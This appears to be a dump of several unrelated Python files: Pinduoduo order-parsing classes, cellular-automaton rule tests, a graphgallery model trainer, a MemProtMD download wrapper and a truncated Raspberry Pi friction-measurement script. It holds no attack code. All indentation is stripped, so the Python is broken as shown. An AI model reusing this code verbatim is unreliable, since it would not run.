self.mall_url = _mall_url
def parse(self, data):
if data is not None:
self.id = get_not_none(data, "id")
self.mall_name = get_not_none(data, "mall_name")
self.mall_url = get_domain() + get_not_none(data, "mall_url")
return self
class OrderInfo:
def __init__(self):
self.order_sn = ""
self.order_status = 0
self.pay_status = 0
self.shipping_time = 0
self.order_time = 0
self.receive_time = 0
self.expect_auto_receive_time = 0
self.order_link_url = ""
self.mall_info = MallInfo()
self.express_id = ""
self.order_goods = []
self.order_status_str = ""
self.shipping_status = 0
def parse(self, data):
self.order_sn = get_not_none(data, "order_sn")
self.order_status = get_int_not_none(data, "order_status", 0)
self.pay_status = get_int_not_none(data, "pay_status", 0)
self.shipping_time = get_int_not_none(data, "shipping_time", 0)
self.order_time = get_int_not_none(data, "order_time", 0)
self.receive_time = get_int_not_none(data, "receive_time", 0)
self.expect_auto_receive_time = get_int_not_none(data, "expect_auto_receive_time", 0)
self.order_link_url = get_not_none(data, "order_link_url")
self.mall_info = MallInfo().parse(data.get("mall"))
self.express_id = get_not_none(data, "tracking_number")
self.order_status_str = get_not_none(data, "order_status_prompt")
self.shipping_status = get_int_not_none(data, "shipping_status", 0)
order_goods = data.get("order_goods")
self.order_goods = []
if order_goods is not None:
for goods in order_goods:
goods_info = PingDuoDuoGood().parse(goods)
self.order_goods.append(goods_info.to_string())
return self
def get_order_goods(self):
return "\n".join(self.order_goods)
def convert_status_code_status(code):
if code == 0:
return ""
elif code == 1:
return "付款"
elif code == 2:
return "待发货"
elif code == 3:
return "收货"
elif code == 4:
return "评价"
elif code == 5:
return "取消"
elif code == 6:
return "退款"
elif code == 7:
return "其他"
return ""
def convert_code_to_express(code):
print "code = " + str(code)
if code == 0:
return ""
elif code == 1:
return "中通"
elif code == 2:
return "邮政"
elif code == 3:
return "圆通"
elif code == 4:
return "申通"
elif code == 5:
return "顺丰"
elif code == 6:
return "韵达"
elif code == 7:
return "百世"
elif code == 8:
return "天天"
elif code == 9:
return "其他"
return ""
class DetailInfo:
@staticmethod
def get_not_none(data, key, default=""):
value = data.get(key)
return value if value is not None else default
def __init__(self, _order_id = "",
_pay_way="",
_snapshot="",
_buy_time="",
_send_type="",
_express="",
_express_id="",
_send_time="",
_goods="",
_mall_id= 0,
_mall_name="",
_mall_url="",
_receive_name="",
_mobile="",
_address=""):
self.order_id = _order_id
self.pay_way = _pay_way
self.snapshot = _snapshot
self.buy_time_str = _buy_time
self.express = _express
self.express_id = _express_id
self.send_time_str = _send_time
self.goods = _goods
self.goods_list = []
self.mall_id = _mall_id
self.mall_name = _mall_name
self.mall_url = _mall_url
self.mobile = _mobile
self.receive_name = _receive_name
self.address = _address
def parse_order_list(self, data):
if data is None:
return
for keyValue in data:
key = keyValue.get("key")
value = keyValue.get("value")
if "订单编号" in key:
self.order_id = value
elif "支付方式" in key:
self.pay_way = value
elif "商品快照" in key:
self.snapshot = value
elif "下单时间" in key:
self.buy_time_str = value
elif "发货时间" in key:
self.send_time_str = value
elif "物流公司" in key:
self.express = value
elif "快递单号" in key:
self.express_id = value
def parse_goods(self, data):
if data is None:
return
self.goods_list = []
for goods in data:
goods_name = self.get_not_none(goods, "goodsName")
goods_price = self.get_not_none(goods, "goodsPrice", 0)
goods_number = self.get_not_none(goods, "goodsNumber", 0)
goods_url = self.get_not_none(goods, "linkUrl")
self.goods_list.append(PingDuoDuoGood(goods_name, goods_number, goods_price, goods_url).to_string())
self.goods = "\n".join(self.goods_list)
def parse_mall(self, data):
if data is None:
return
self.mall_id = self.get_not_none(data, "id", 0)
self.mall_name = self.get_not_none(data, "mallName")
self.mall_url = self.get_not_none(data, "mallUrl")
def parse_receive_info(self, data):
self.receive_name = self.get_not_none(data, "receiveName")
self.mobile = self.get_not_none(data, "mobile")
address = self.get_not_none(data, "address")
district_name = self.get_not_none(data, "districtName")
city_name = self.get_not_none(data, "cityName")
shipping_address = self.get_not_none(data, "shippingAddress")
province_name = self.get_not_none(data, "provinceName")
self.address = province_name + city_name + district_name + shipping_address + address
def parse(self, data):
self.parse_receive_info(data)
self.parse_order_list(data.get("orderDescList"))
self.parse_goods(data.get("orderGoods"))
self.parse_mall(data.get("mall"))
class Order:
def __init__(self, _user_id, _order_info = OrderInfo(), _detail_info = DetailInfo()):
self.user_id = _user_id
self.order_info = _order_info
self.detail_info = _detail_info |
<gh_stars>10-100
from netomaton import topology, utils
import netomaton.rules as rules
from netomaton import NodeContext, evolve
from .rule_test import *
class TestRules(RuleTest):
def test_majority_rule(self):
actual = rules.majority_rule(NodeContext(0, 1, {}, [0, 1, 2, 3, 4], [1, 2, 1, 3, 4], [1., 1., 1., 1., 1.], 0, None, None))
expected = 1
self.assertEqual(expected, actual)
actual = rules.majority_rule(NodeContext(0, 1, {}, [0, 1, 2, 3, 4], [2, 2, 2, 2, 2], [1., 1., 1., 1., 1.], 0, None, None))
expected = 2
self.assertEqual(expected, actual)
actual = rules.majority_rule(NodeContext(0, 1, {}, [0], [3], [1.], 0, None, None))
expected = 3
self.assertEqual(expected, actual)
actual = rules.majority_rule(NodeContext(0, 1, {}, [0, 1, 2], [0., 0., 5423.], [1., 1., 1.], 0, None, None))
expected = 0.
self.assertEqual(expected, actual)
def test_rule0_simple_init(self):
expected = self._convert_to_matrix("rule0_simple_init.ca")
actual = self._evolve_nks_ca(expected, 0)
np.testing.assert_equal(expected, actual)
def test_rule0_random_init(self):
expected = self._convert_to_matrix("rule0_random_init.ca")
actual = self._evolve_nks_ca(expected, 0)
np.testing.assert_equal(expected, actual)
def test_nks_ca_rule30_simple_init(self):
expected_activities = self._convert_to_matrix("rule30_simple_init.ca")
actual_activities = self._evolve_nks_ca(expected_activities, 30)
np.testing.assert_equal(expected_activities, actual_activities)
def test_nks_ca_rule30_random_init(self):
expected_activities = self._convert_to_matrix("rule30_random_init.ca")
actual_activities = self._evolve_nks_ca(expected_activities, 30)
np.testing.assert_equal(expected_activities, actual_activities)
def test_rule126_simple_init(self):
expected = self._convert_to_matrix("rule126_simple_init.ca")
actual = self._evolve_nks_ca(expected, 126)
np.testing.assert_equal(expected, actual)
def test_rule126_random_init(self):
expected = self._convert_to_matrix("rule126_random_init.ca")
actual = self._evolve_nks_ca(expected, 126)
np.testing.assert_equal(expected, actual)
def test_rule225_simple_init(self):
expected = self._convert_to_matrix("rule225_simple_init.ca")
actual = self._evolve_nks_ca(expected, 225)
np.testing.assert_equal(expected, actual)
def test_rule225_random_init(self):
expected = self._convert_to_matrix("rule225_random_init.ca")
actual = self._evolve_nks_ca(expected, 225)
np.testing.assert_equal(expected, actual)
def test_rule255_simple_init(self):
expected = self._convert_to_matrix("rule255_simple_init.ca")
actual = self._evolve_nks_ca(expected, 255)
np.testing.assert_equal(expected, actual)
def test_rule255_random_init(self):
expected = self._convert_to_matrix("rule255_random_init.ca")
actual = self._evolve_nks_ca(expected, 255)
np.testing.assert_equal(expected, actual)
def test_totalistic_3color_rule777_simple_init(self):
expected = self._convert_to_matrix("tot3_rule777_simple_init.ca")
actual = self._evolve_totalistic_ca(expected, 3, 777)
np.testing.assert_equal(expected, actual)
def test_totalistic_3color_rule777_random_init(self):
expected = self._convert_to_matrix("tot3_rule777_random_init.ca")
actual = self._evolve_totalistic_ca(expected, 3, 777)
np.testing.assert_equal(expected, actual)
def test_totalistic_4color_rule107396_simple_init(self):
expected = self._convert_to_matrix("tot4_rule107396_simple_init.ca")
actual = self._evolve_totalistic_ca(expected, 4, 107396)
np.testing.assert_equal(expected, actual)
def test_totalistic_4color_rule107396_random_init(self):
expected = self._convert_to_matrix("tot4_rule107396_random_init.ca")
actual = self._evolve_totalistic_ca(expected, 4, 107396)
np.testing.assert_equal(expected, actual)
def test_shift_to_center(self):
activities = [1, 1, 0]
node_indices = [0, 1, 199]
node_index = 0
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([0, 1, 1], shifted)
activities = [1, 1, 0]
node_indices = [0, 1, 199]
node_index = 1
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([1, 1, 0], shifted)
activities = [1, 1, 0]
node_indices = [0, 1, 199]
node_index = 199
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([1, 0, 1], shifted)
activities = [1, 2, 3, 4, 5]
node_indices = [0, 1, 2, 198, 199]
node_index = 0
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([4, 5, 1, 2, 3], shifted)
activities = [1, 2, 3, 4, 5]
node_indices = [0, 1, 2, 198, 199]
node_index = 1
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([5, 1, 2, 3, 4], shifted)
activities = [1, 2, 3, 4, 5]
node_indices = [0, 1, 2, 198, 199]
node_index = 2
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([1, 2, 3, 4, 5], shifted)
activities = [1, 2, 3, 4, 5]
node_indices = [0, 1, 2, 198, 199]
node_index = 198
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([2, 3, 4, 5, 1], shifted)
activities = [1, 2, 3, 4, 5]
node_indices = [0, 1, 2, 198, 199]
node_index = 199
shifted = rules.shift_to_center(activities, node_indices, node_index)
self.assertEqual([3, 4, 5, 1, 2], shifted)
def test_ca_density_classification(self):
expected = self._convert_to_matrix("ca_density_classification.ca")
actual = self._evolve_binary_ca(expected, r=3, rule=6667021275756174439087127638698866559)
np.testing.assert_equal(expected, actual)
def test_tot_rule126_2d_n9_simple_init(self):
expected = self._convert_to_matrix2d("tot_rule126_2d_n9_simple_init.ca")
actual = self._evolve_totalistic_ca2d(expected, 126, 'Moore')
np.testing.assert_equal(expected, actual)
def test_tot_rule26_2d_n5_simple_init(self):
expected = self._convert_to_matrix2d("tot_rule26_2d_n5_simple_init.ca")
actual = self._evolve_totalistic_ca2d(expected, 26, '<NAME>')
np.testing.assert_equal(expected, actual)
@staticmethod
def _evolve_nks_ca(expected, rule):
rows, size = expected.shape
initial_conditions = np.array(expected[0]).flatten()
network = topology.cellular_automaton(n=size, r=1)
trajectory = evolve(initial_conditions=initial_conditions, network=network,
activity_rule=rules.nks_ca_rule(rule), timesteps=rows)
return utils.get_activities_over_time_as_list(trajectory)
@staticmethod
def _evolve_binary_ca(expected, r, rule):
rows, size = expected.shape
initial_conditions = np.array(expected[0]).flatten()
network = topology.cellular_automaton(n=size, r=r)
trajectory = evolve(initial_conditions=initial_conditions, network=network,
activity_rule=rules.binary_ca_rule(rule), timesteps=rows)
return utils.get_activities_over_time_as_list(trajectory)
@staticmethod
def _evolve_totalistic_ca(expected, k, rule):
rows, size = expected.shape
initial_conditions = np.array(expected[0]).flatten()
network = topology.cellular_automaton(n=size, r=1)
trajectory = evolve(initial_conditions=initial_conditions, network=network,
activity_rule=rules.totalistic_ca(k, rule), timesteps=rows)
return utils.get_activities_over_time_as_list(trajectory)
@staticmethod
def _evolve_totalistic_ca2d(expected, rule, neighbourhood):
steps, rows, size = expected.shape
initial_conditions = np.array(expected[0]).reshape(rows * size).flatten()
network = topology.cellular_automaton2d(rows=rows, cols=size, r=1, neighbourhood=neighbourhood)
trajectory = evolve(initial_conditions=initial_conditions, network=network,
activity_rule=rules.totalistic_ca(k=2, rule=rule), timesteps=steps)
activities = utils.get_activities_over_time_as_list(trajectory)
return np.array(activities).reshape((steps, rows, size))
|
import os
import sys
import warnings
import importlib
import inspect
import os.path as osp
import numpy as np
import tensorflow as tf
from tensorflow.keras.utils import Sequence
from tensorflow.python.keras import callbacks as callbacks_module
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
from tensorflow.keras.callbacks import History
from torch.utils.data import DataLoader, Dataset
import graphgallery as gg
from graphgallery import functional as gf
from graphgallery.data.io import makedirs_from_filepath
from graphgallery.gallery import Model
from graphgallery.utils import Progbar
# TensorFlow 2.1.x
# Ignora warnings:
# UserWarning: Converting sparse IndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.
# This is caused by `tf.gather` and it will be solved in future tensorflow version.
warnings.filterwarnings(
'ignore',
message='.*Converting sparse IndexedSlices to a dense Tensor of unknown shape.*')
# TensorFlow 2.4.0
# Ignora warnings:
# UserWarning: Converting sparse IndexedSlices(IndexedSlices(indices=...) to a dense Tensor of unknown shape.
# This may consume a large amount of memory.
warnings.filterwarnings(
'ignore', message='.*to a dense Tensor of unknown shape.*')
def format_doc(d):
msg = ""
for i, (k, v) in enumerate(d.items()):
if v != "UNSPECIDIED":
msg += f"({i + 1}) `{k}`, Default is `{v}` \n"
else:
msg += f"({i + 1}) `{k}`, UNSPECIDIED argument\n"
return msg
def doc_dict(func):
ArgSpec = inspect.getfullargspec(func)
args = ArgSpec.args if ArgSpec.args else []
args = args[1:] if args[0] == "self" else args
defaults = ArgSpec.defaults if ArgSpec.defaults else []
delta_l = len(args) - len(defaults)
defaults = ["UNSPECIDIED"] * delta_l + list(defaults)
d = dict(zip(args, defaults))
return d
def make_docs(*func):
d = {}
for f in func:
d.update(doc_dict(f))
return format_doc(d)
def unravel_batch(batch):
inputs = labels = out_index = None
if isinstance(batch, (list, tuple)):
inputs = batch[0]
labels = batch[1]
if len(batch) > 2:
out_index = batch[-1]
else:
inputs = batch
if isinstance(labels, (list, tuple)) and len(labels) == 1:
labels = labels[0]
if isinstance(out_index, (list, tuple)) and len(out_index) == 1:
out_index = out_index[0]
return inputs, labels, out_index
class Trainer(Model):
def setup_cfg(self):
"""load the default config function `default_cfg_setup` for the corresponding task.
Raises
------
RuntimeError
the default config function `default_cfg_setup` not found in the file `graphgallery.gallery.[task].default`
"""
# nodeclas/linkpred/...
task_module = self.__module__.split('.')[2]
# graphgallery.gallery
gallery_module = '.'.join(__name__.split('.')[:-1])
try:
default_setup = importlib.import_module(f".{task_module}.default", gallery_module)
except ModuleNotFoundError:
raise RuntimeError(f"default setup function `{gallery_module}.{task_module}.default.default_cfg_setup` not found!")
default_setup.default_cfg_setup(self.cfg)
@np.deprecate(old_name="make_data",
message=("the method `trainer.make_data` is currently deprecated from 0.9.0,"
" please use `trainer.setup_graph` instead."))
def make_data(self, *args, **kwargs):
return self.setup_graph(*args, **kwargs)
def setup_graph(self, graph, graph_transform=None, device=None, **kwargs):
"""This method is used for process your inputs, which accepts
only keyword arguments in your defined method 'data_step'.
This method will process the inputs, and transform them into tensors.
Commonly used keyword arguments:
--------------------------------
graph: graphgallery graph classes.
graph_transform: string, Callable function,
or a tuple with function and dict arguments.
transform for the entire graph, it is used first.
device: device for preparing data, if None, it defaults to `self.device`
adj_transform: string, Callable function,
or a tuple with function and dict arguments.
transform for adjacency matrix.
attr_transform: string, Callable function,
or a tuple with function and dict arguments.
transform for attribute matrix.
other arguments (if have) will be passed into method 'data_step'.
"""
self.empty_cache()
model = self.model
if model is not None and hasattr(model, 'empty_cache'):
model.empty_cache()
self.graph = gf.get(graph_transform)(graph)
cfg = self.cfg.data
if device is not None:
self.data_device = gf.device(device, self.backend)
else:
self.data_device = self.device
cfg.device = device
_, kwargs = gf.wrapper(self.data_step)(**kwargs)
kwargs['graph_transform'] = graph_transform
cfg.merge_from_dict(kwargs)
for k, v in kwargs.items():
if k.endswith("transform"):
setattr(self.transform, k, gf.get(v))
return self
def data_step(self, *args, **kwargs):
"""Implement you data processing function here"""
raise NotImplementedError
def build(self, **kwargs):
"""This method is used for build your model, which
accepts only keyword arguments in your defined method 'model_step'.
Note:
-----
This method should be called after `process`.
Commonly used keyword arguments:
--------------------------------
hids: int or a list of them,
hidden units for each hidden layer.
acts: string or a list of them,
activation functions for each layer.
dropout: float scalar,
dropout used in the model.
lr: float scalar,
learning rate used for the model.
weight_decay: float scalar,
weight decay used for the model weights.
bias: bool,
whether to use bias in each layer.
use_tfn: bool,
this argument is only used for TensorFlow backend, if `True`, it will decorate
the model training and testing with `tf.function` (See `graphgallery.nn.modes.TFKeras`).
By default, it was `True`, which can accelerate the training and inference, by it may cause
several errors.
other arguments (if have) will be passed into your method 'model_step'.
"""
if self._graph is None:
raise RuntimeError("Please call 'trainer.setup_graph(graph)' first.")
use_tfn = kwargs.get("use_tfn", True)
if self.backend == "tensorflow":
with tf.device(self.device):
self.model, kwargs = gf.wrapper(self.model_step)(**kwargs)
if use_tfn:
self.model.use_tfn()
else:
kwargs.pop("use_tfn", None)
model, kwargs = gf.wrapper(self.model_step)(**kwargs)
self.model = model.to(self.device)
self.cfg.model.merge_from_dict(kwargs)
return self
def model_step(self, *args, **kwargs):
"""Implement you model building function here"""
raise NotImplementedError
def fit(self, train_data, val_data=None, **kwargs):
cache = self.cache
cfg = self.cfg.fit
cfg.merge_from_dict(kwargs)
ckpt_cfg = cfg.ModelCheckpoint
es_cfg = cfg.EarlyStopping
pb_cfg = cfg.Progbar
log_cfg = cfg.Logger
if log_cfg.enabled:
log_cfg.name = log_cfg.name or self.name
logger = gg.utils.setup_logger(output=log_cfg.filepath, name=log_cfg.name)
model = self.model
if model is None:
raise RuntimeError(
'You must compile your model before training/testing/predicting. Use `trainer.build()`.'
)
if not isinstance(train_data, (Sequence, DataLoader, Dataset)):
train_data = self.train_loader(train_data)
if cfg.cache_train_data:
cache.train_data = train_data
validation = val_data is not None
if validation:
if not isinstance(val_data, (Sequence, DataLoader, Dataset)):
val_data = self.test_loader(val_data)
if cfg.cache_val_data:
cache.val_data = val_data
# Setup callbacks
callbacks = callbacks_module.CallbackList()
history = History()
callbacks.append(history)
cfg, callbacks = setup_callbacks(cfg, callbacks, validation)
callbacks.set_model(model)
self.callbacks = callbacks
model.stop_training = False
verbose = cfg.verbose
assert not (verbose and log_cfg.enabled), "Progbar and Logger cannot be used together! You must set `verbose=0` when Logger is enabled."
if verbose:
if verbose <= 2:
progbar = Progbar(target=cfg.epochs,
width=pb_cfg.width,
verbose=verbose)
print("Training...")
elif log_cfg.enabled:
logger.info("Training...")
logs = gf.BunchDict()
callbacks.on_train_begin()
# for some initialization
if hasattr(model, 'on_train_begin'):
model.on_train_begin()
try:
for epoch in range(cfg.epochs):
if verbose > 2:
progbar = Progbar(target=len(train_data),
width=pb_cfg.width,
verbose=verbose - 2)
callbacks.on_epoch_begin(epoch)
train_logs = self.train_step(train_data)
if hasattr(train_data, 'on_epoch_end'):
train_data.on_epoch_end()
logs.update({k: to_item(v) for k, v in train_logs.items()})
if validation:
valid_logs = self.test_step(val_data)
logs.update({("val_" + k): to_item(v) for k, v in valid_logs.items()})
if hasattr(val_data, 'on_epoch_end'):
val_data.on_epoch_end()
callbacks.on_train_batch_end(len(train_data), logs)
callbacks.on_epoch_end(epoch, logs)
if verbose > 2:
print(f"Epoch {epoch+1}/{cfg.epochs}")
progbar.update(len(train_data), logs.items())
elif verbose:
progbar.update(epoch + 1, logs.items())
elif log_cfg.enabled:
logger.info(f"Epoch {epoch+1}/{cfg.epochs}\n{gg.utils.create_table(logs)}")
if model.stop_training:
if log_cfg.enabled:
logger.info(f"Early Stopping at Epoch {epoch}")
else:
print(f"Early Stopping at Epoch {epoch}", file=sys.stderr)
break
callbacks.on_train_end()
if ckpt_cfg.enabled:
if ckpt_cfg.save_weights_only:
model.load_weights(ckpt_cfg.path)
else:
self.model = model.load(ckpt_cfg.path)
finally:
# to avoid unexpected termination of the model
if ckpt_cfg.enabled and ckpt_cfg.remove_weights:
self.remove_weights()
return history
def evaluate(self, test_data, **kwargs):
if not self.model:
raise RuntimeError(
'You must compile your model before training/testing/predicting. Use `trainer.build()`.'
)
cache = self.cache
cfg = self.cfg.evaluate
cfg.merge_from_dict(kwargs)
if not isinstance(test_data, (Sequence, DataLoader, Dataset)):
test_data = self.test_loader(test_data)
if cfg.cache_test_data:
cache.test_data = test_data
if cfg.verbose:
print("Testing...")
progbar = Progbar(target=len(test_data),
width=cfg.Progbar.width,
verbose=cfg.verbose)
logs = gf.BunchDict(**self.test_step(test_data))
logs.update({k: to_item(v) for k, v in logs.items()})
progbar.update(len(test_data), logs.items())
return logs
def train_step(self, sequence):
model = self.model
model.reset_metrics()
results = None
for epoch, batch in enumerate(sequence):
self.callbacks.on_train_batch_begin(epoch)
inputs, labels, out_index = unravel_batch(batch)
results = model.train_step_on_batch(x=inputs,
y=labels,
out_index=out_index,
device=self.device)
return results
def test_step(self, sequence):
model = self.model
model.reset_metrics()
results = None
for batch in sequence:
inputs, labels, out_index = unravel_batch(batch)
results = model.test_step_on_batch(x=inputs,
y=labels,
out_index=out_index,
device=self.device)
return results
def predict(self, predict_data=None, transform=None):
if not self.model:
raise RuntimeError(
'You must compile your model before training/testing/predicting. Use `trainer.build()`.'
)
cache = self.cache
cfg = self.cfg.predict
cfg.transform = transform
if not isinstance(predict_data, (Sequence, DataLoader, Dataset)):
predict_data = self.predict_loader(predict_data)
if cfg.cache_predict_data:
cache.predict_data = predict_data
logits = self.predict_step(predict_data)
self.transform.logit_transform = T = gf.get(transform)
logits = T(logits)
return logits.squeeze()
def predict_step(self, sequence):
logits = []
model = self.model
for batch in sequence:
inputs, labels, out_index = unravel_batch(batch)
logit = model.predict_step_on_batch(x=inputs,
out_index=out_index,
device=self.device)
logits.append(logit)
return np.vstack(logits)
def train_loader(self, inputs, **kwargs):
raise NotImplementedError
def test_loader(self, inputs, **kwargs):
return self.train_loader(inputs, **kwargs)
def predict_loader(self, inputs, **kwargs):
return self.test_loader(inputs, **kwargs)
def _test_predict(self, index):
logit = self.predict(index)
predict_class = logit.argmax(1)
labels = self.graph.node_label[index]
return (predict_class == labels).mean()
def reset_weights(self):
# TODO: add pytorch support
"""reset the model to the first time."""
model = self.model
if self.backup is None:
raise RuntimeError(
"You must store the `backup` before `reset_weights`."
"`backup` will be automatically stored when the model is built."
)
for w, wb in zip(model.weights, self.backup):
w.assign(wb)
@ property
def model(self):
return self._model
@ model.setter
def model(self, m):
# Back up
# if isinstance(m, tf.keras.Model) and m.weights:
# self.backup = tf.identity_n(m.weights)
# TODO assert m is None or isinstance(m, tf.keras.Model) or torch.nn.Module
self._model = m
def reset_optimizer(self):
# TODO: add pytorch support
model = self.model
if not hasattr(model, 'optimizer'):
raise RuntimeError("The model has not attribute `optimizer`!")
for var in model.optimizer.variables():
var.assign(tf.zeros_like(var))
def reset_lr(self, value):
# TODO: add pytorch support
model = self.model
if not hasattr(model, 'optimizer'):
raise RuntimeError("The model has not attribute `optimizer`!")
model.optimizer.learning_rate.assign(value)
def remove_weights(self):
filepath = self.cfg.fit.ModelCheckpoint.path
if self.backend == "tensorflow":
remove_extra_tf_files(filepath)
if osp.exists(filepath):
os.remove(filepath)
def help(self, return_msg=False):
"""return help message for the `trainer`"""
msg = f"""
**************************************Help Message for {self.name}******************************************
|First, setup a graph, run `trainer.setup_graph`, the reqiured argument are: |
{make_docs(self.setup_graph, self.data_step)}
|Second, build your model, run `trainer.build`, the reqiured argument are: |
{make_docs(self.build, self.model_step)}
|Third, train your model, run `trainer.fit`, the reqiured argument are: |
{make_docs(self.fit)}
|Finall and optionally, evaluate your model, run `trainer.evaluate`, the reqiured argument are: |
{make_docs(self.evaluate)}
"""
if return_msg:
return msg
else:
print(msg)
# def __getattr__(self, attr):
# ##### FIXME: This may cause ERROR ######
# try:
# return self.__dict__[attr]
# except KeyError:
# if hasattr(self, "_model") and hasattr(self._model, attr):
# return getattr(self._model, attr)
# raise AttributeError(
# f"'{self.name}' and '{self.name}.model' objects have no attribute '{attr}'"
# )
def to_item(value):
if value is None:
return value
elif hasattr(value, 'numpy'):
value = value.numpy()
if hasattr(value, 'item'):
value = value.item()
return value
def remove_extra_tf_files(filepath):
# for tensorflow weights that saved without h5 formate
for ext in (".data-00000-of-00001", ".index"):
path = filepath + ext
if osp.exists(path):
os.remove(path)
filedir = osp.split(osp.realpath(filepath))[0]
path = osp.join(filedir, "checkpoint")
if osp.exists(path):
os.remove(path)
def setup_callbacks(cfg, callbacks, validation):
ckpt_cfg = cfg.ModelCheckpoint
es_cfg = cfg.EarlyStopping
tb_cfg = cfg.TensorBoard
if not validation:
if ckpt_cfg.enabled and ckpt_cfg.monitor.startswith("val_"):
ckpt_cfg.enabled = False
ckpt_cfg.monitor = ckpt_cfg.monitor[4:]
if es_cfg.enabled and es_cfg.monitor.startswith("val_"):
es_cfg.enabled = False
es_cfg.monitor = es_cfg.monitor[4:]
if es_cfg.enabled:
es_callback = EarlyStopping(monitor=es_cfg.monitor,
patience=es_cfg.patience,
mode=es_cfg.mode,
verbose=es_cfg.verbose,
baseline=es_cfg.baseline,
restore_best_weights=es_cfg.restore_best_weights)
callbacks.append(es_callback)
if ckpt_cfg.enabled:
if not ckpt_cfg.path.endswith(gg.file_ext()):
ckpt_cfg.path += gg.file_ext()
makedirs_from_filepath(ckpt_cfg.path)
mc_callback = ModelCheckpoint(ckpt_cfg.path,
mode=ckpt_cfg.mode,
monitor=ckpt_cfg.monitor,
save_best_only=ckpt_cfg.save_best_only,
save_weights_only=ckpt_cfg.save_weights_only,
verbose=ckpt_cfg.verbose)
callbacks.append(mc_callback)
if tb_cfg.enabled:
callbacks.append(tf.keras.callbacks.TensorBoard(tb_cfg.log_dir,
write_graph=tb_cfg.write_graph,
update_freq=tb_cfg.update_freq,
histogram_freq=tb_cfg.histogram_freq,
write_images=tb_cfg.write_images))
return cfg, callbacks
|
#!/usr/bin/env python
"""Module containing the MemProtMDSim class and the command line interface."""
import argparse
from biobb_common.generic.biobb_object import BiobbObject
from biobb_common.configuration import settings
from biobb_common.tools import file_utils as fu
from biobb_common.tools.file_utils import launchlogger
from biobb_io.api.common import *
class MemProtMDSim(BiobbObject):
"""
| biobb_io MemProtMDSim
| This class is a wrapper of the MemProtMD to download a simulation using its REST API.
| Wrapper for the `MemProtMD DB REST API <http://memprotmd.bioch.ox.ac.uk/>`_ to download a simulation.
Args:
output_simulation (str): Path to the output simulation in a ZIP file. File type: output. `Sample file <https://github.com/bioexcel/biobb_io/raw/master/biobb_io/test/reference/api/output_sim.zip>`_. Accepted formats: zip (edam:format_3987).
properties (dic - Python dictionary object containing the tool parameters, not input/output files):
* **pdb_code** (*str*) - (None) RSCB PDB code.
* **remove_tmp** (*bool*) - (True) [WF property] Remove temporal files.
* **restart** (*bool*) - (False) [WF property] Do not execute if output files exist.
Examples:
This is a use example of how to use the building block from Python::
from biobb_io.api.memprotmd_sim import memprotmd_sim
prop = {
'pdb_code': '2VGB'
}
memprotmd_sim(output_simulation='/path/to/newSimulation.zip',
properties=prop)
Info:
* wrapped_software:
* name: MemProtMD DB
* license: Creative Commons
* ontology:
* name: EDAM
* schema: http://edamontology.org/EDAM.owl
"""
def __init__(self, output_simulation,
properties=None, **kwargs) -> None:
properties = properties or {}
# Call parent class constructor
super().__init__(properties)
# Input/Output files
self.io_dict = {
"out": { "output_simulation": output_simulation }
}
# Properties specific for BB
self.pdb_code = properties.get('pdb_code', None)
self.properties = properties
# Check the properties
self.check_properties(properties)
def check_data_params(self, out_log, err_log):
""" Checks all the input/output paths and parameters """
self.output_simulation = check_output_path(self.io_dict["out"]["output_simulation"], "output_simulation", False, out_log, self.__class__.__name__)
@launchlogger
def launch(self) -> int:
"""Execute the :class:`MemProtMDSim <api.memprotmd_sim.MemProtMDSim>` api.memprotmd_sim.MemProtMDSim object."""
# check input/output paths and parameters
self.check_data_params(self.out_log, self.err_log)
# Setup Biobb
if self.check_restart(): return 0
self.stage_files()
check_mandatory_property(self.pdb_code, 'pdb_code', self.out_log, self.__class__.__name__)
# get simulation files and save to output
json_string = get_memprotmd_sim(self.pdb_code, self.output_simulation, self.out_log, self.global_log)
return 0
def memprotmd_sim(output_simulation: str, properties: dict = None, **kwargs) -> int:
"""Execute the :class:`MemProtMDSim <api.memprotmd_sim.MemProtMDSim>` class and
execute the :meth:`launch() <api.memprotmd_sim.MemProtMDSim.launch>` method."""
return MemProtMDSim(output_simulation=output_simulation,
properties=properties, **kwargs).launch()
def main():
"""Command line execution of this building block. Please check the command line documentation."""
parser = argparse.ArgumentParser(description="Wrapper for the MemProtMD DB REST API (http://memprotmd.bioch.ox.ac.uk/) to download a simulation.", formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=99999))
parser.add_argument('-c', '--config', required=False, help="This file can be a YAML file, JSON file or JSON string")
# Specific args of each building block
required_args = parser.add_argument_group('required arguments')
required_args.add_argument('-o', '--output_simulation', required=True, help="Path to the output simulation in a ZIP file. Accepted formats: zip.")
args = parser.parse_args()
config = args.config if args.config else None
properties = settings.ConfReader(config=config).get_prop_dic()
# Specific call of each building block
memprotmd_sim(output_simulation=args.output_simulation,
properties=properties)
if __name__ == '__main__':
main()
|
<filename>Codes/main.py<gh_stars>0
from threading import Thread
from imutils.video import VideoStream
import cv2
import time
import imutils
import math
import argparse
import matplotlib.pyplot as plt
import numpy as np
parser = argparse.ArgumentParser(
description='This program calculates either the static or kinetic friction coefficient between two surfaces.')
parser.add_argument('mode', type=str, default=None,
help='Chose mode. The mode can either be "static" or "kinetic"')
args = parser.parse_args()
mode = args.mode
class Vision(Thread):
def __init__(self, system):
super().__init__()
self.camera = VideoStream(usePiCamera=True, resolution=(688, 528)).start()
time.sleep(0.5)
self.tracker = cv2.TrackerMOSSE_create()
self.isTracking = None
self.initBB = None
self.frame = None
self.initial_target_object_center = None
self.initial_time = time.time()
self.moving = False
self.motion_detected = False
self.speed = 0
self.system = system
self.is_running = True
self.framesToShow = dict()
self.isWindowShowEnabled = False
self.key = "empty"
self.coefficient_of_static_friction = 0.0
self.coefficient_of_kinetic_friction = 0.0
def run(self):
while self.is_running:
frame = self.camera.read()
# Object tracking
if self.isTracking:
(success, box) = self.tracker.update(frame)
if success:
(x, y, w, h) = [int(v) for v in box]
frame = cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
final_target_object_center = (x + w / 2, y + h / 2)
self.speed = self.get_speed(final_target_object_center)
if self.speed > frame.shape[0] * frame.shape[1] / 100000:
self.motion_detected = True
